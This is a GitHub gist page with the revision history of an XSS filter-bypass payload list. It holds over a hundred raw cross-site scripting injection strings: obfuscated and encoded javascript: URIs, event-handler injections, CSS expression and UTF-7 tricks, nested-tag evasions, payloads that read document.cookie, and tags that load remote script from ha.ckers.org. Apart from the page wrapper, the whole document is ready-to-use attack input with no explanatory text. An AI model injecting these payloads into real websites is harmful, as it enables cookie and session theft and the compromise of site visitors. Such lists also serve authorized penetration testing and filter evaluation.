Skip to content

Instantly share code, notes, and snippets.

@rvrsh3ll

rvrsh3ll/xxsfilterbypass.lst

Last active October 4, 2025 22:33
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save rvrsh3ll/09a8b933291f9f98e8ec to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save rvrsh3ll/09a8b933291f9f98e8ec to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. rvrsh3ll revised this gist Feb 22, 2017. 1 changed file with 2 additions and 1 deletion.
    3 changes: 2 additions & 1 deletion xxsfilterbypass.lst
    View file
    Original file line number Diff line number Diff line change
    @@ -105,4 +105,5 @@ alert;pg("XSS")
    <svg/onload=%26%23097lert%26lpar;1337)>
    <script>for((i)in(self))eval(i)(1)</script>
    <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
    <sCR<script>iPt>alert(1)</SCr</script>IPt>
    <sCR<script>iPt>alert(1)</SCr</script>IPt>
    <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
  2. rvrsh3ll revised this gist Feb 22, 2017. 1 changed file with 2 additions and 1 deletion.
    3 changes: 2 additions & 1 deletion xxsfilterbypass.lst
    View file
    Original file line number Diff line number Diff line change
    @@ -104,4 +104,5 @@ javascript:alert%281%29;
    alert;pg("XSS")
    <svg/onload=%26%23097lert%26lpar;1337)>
    <script>for((i)in(self))eval(i)(1)</script>
    <scr<script>ipt>alert(1)</scr</script>ipt>
    <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
    <sCR<script>iPt>alert(1)</SCr</script>IPt>
  3. rvrsh3ll revised this gist Feb 22, 2017. 1 changed file with 2 additions and 1 deletion.
    3 changes: 2 additions & 1 deletion xxsfilterbypass.lst
    View file
    Original file line number Diff line number Diff line change
    @@ -103,4 +103,5 @@ javascript:alert%281%29;
    <w contenteditable id=x onfocus=alert()>
    alert;pg("XSS")
    <svg/onload=%26%23097lert%26lpar;1337)>
    <script>for((i)in(self))eval(i)(1)</script>
    <script>for((i)in(self))eval(i)(1)</script>
    <scr<script>ipt>alert(1)</scr</script>ipt>
  4. rvrsh3ll created this gist Feb 1, 2016.
    106 changes: 106 additions & 0 deletions xxsfilterbypass.lst
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,106 @@
    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
    '';!--"<XSS>=&{()}
    0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
    <script/src=data:,alert()>
    <marquee/onstart=alert()>
    <video/poster/onerror=alert()>
    <isindex/autofocus/onfocus=alert()>
    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
    <IMG SRC="javascript:alert('XSS');">
    <IMG SRC=javascript:alert('XSS')>
    <IMG SRC=JaVaScRiPt:alert('XSS')>
    <IMG SRC=javascript:alert("XSS")>
    <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
    <a onmouseover="alert(document.cookie)">xxs link</a>
    <a onmouseover=alert(document.cookie)>xxs link</a>
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    <IMG SRC=# onmouseover="alert('xxs')">
    <IMG SRC= onmouseover="alert('xxs')">
    <IMG onmouseover="alert('xxs')">
    <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
    <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
    &#39;&#88;&#83;&#83;&#39;&#41;>
    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
    #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
    <IMG SRC="jav ascript:alert('XSS');">
    <IMG SRC="jav&#x09;ascript:alert('XSS');">
    <IMG SRC="jav&#x0A;ascript:alert('XSS');">
    <IMG SRC="jav&#x0D;ascript:alert('XSS');">
    <IMG SRC=" &#14; javascript:alert('XSS');">
    <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <<SCRIPT>alert("XSS");//<</SCRIPT>
    <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
    <SCRIPT SRC=//ha.ckers.org/.j>
    <IMG SRC="javascript:alert('XSS')"
    <iframe src=http://ha.ckers.org/scriptlet.html <
    \";alert('XSS');//
    </script><script>alert('XSS');</script>
    </TITLE><SCRIPT>alert("XSS");</SCRIPT>
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
    <BODY BACKGROUND="javascript:alert('XSS')">
    <IMG DYNSRC="javascript:alert('XSS')">
    <IMG LOWSRC="javascript:alert('XSS')">
    <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
    <IMG SRC='vbscript:msgbox("XSS")'>
    <IMG SRC="livescript:[code]">
    <BODY ONLOAD=alert('XSS')>
    <BGSOUND SRC="javascript:alert('XSS');">
    <BR SIZE="&{alert('XSS')}">
    <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
    <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
    <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
    <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
    <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
    <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
    exp/*<A STYLE='no\xss:noxss("*//*");
    xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
    <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
    <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
    <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
    <XSS STYLE="xss:expression(alert('XSS'))">
    <XSS STYLE="behavior: url(xss.htc);">
    ¼script¾alert(¢XSS¢)¼/script¾
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
    <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
    <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
    <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
    <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
    <TABLE BACKGROUND="javascript:alert('XSS')">
    <TABLE><TD BACKGROUND="javascript:alert('XSS')">
    <DIV STYLE="background-image: url(javascript:alert('XSS'))">
    <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
    <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
    <DIV STYLE="width: expression(alert('XSS'));">
    <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
    <BASE HREF="javascript:alert('XSS');//">
    <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
    <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
    <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
    <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
    <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
    <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <A HREF="http://66.102.7.147/">XSS</A>
    0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
    veris-->group<svg/onload=alert(/XSS/)//
    #"><img src=M onerror=alert('XSS');>
    element[attribute='<img src=x onerror=alert('XSS');>
    [<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
    %22;alert%28%27RVRSH3LL_XSS%29//
    javascript:alert%281%29;
    <w contenteditable id=x onfocus=alert()>
    alert;pg("XSS")
    <svg/onload=%26%23097lert%26lpar;1337)>
    <script>for((i)in(self))eval(i)(1)</script>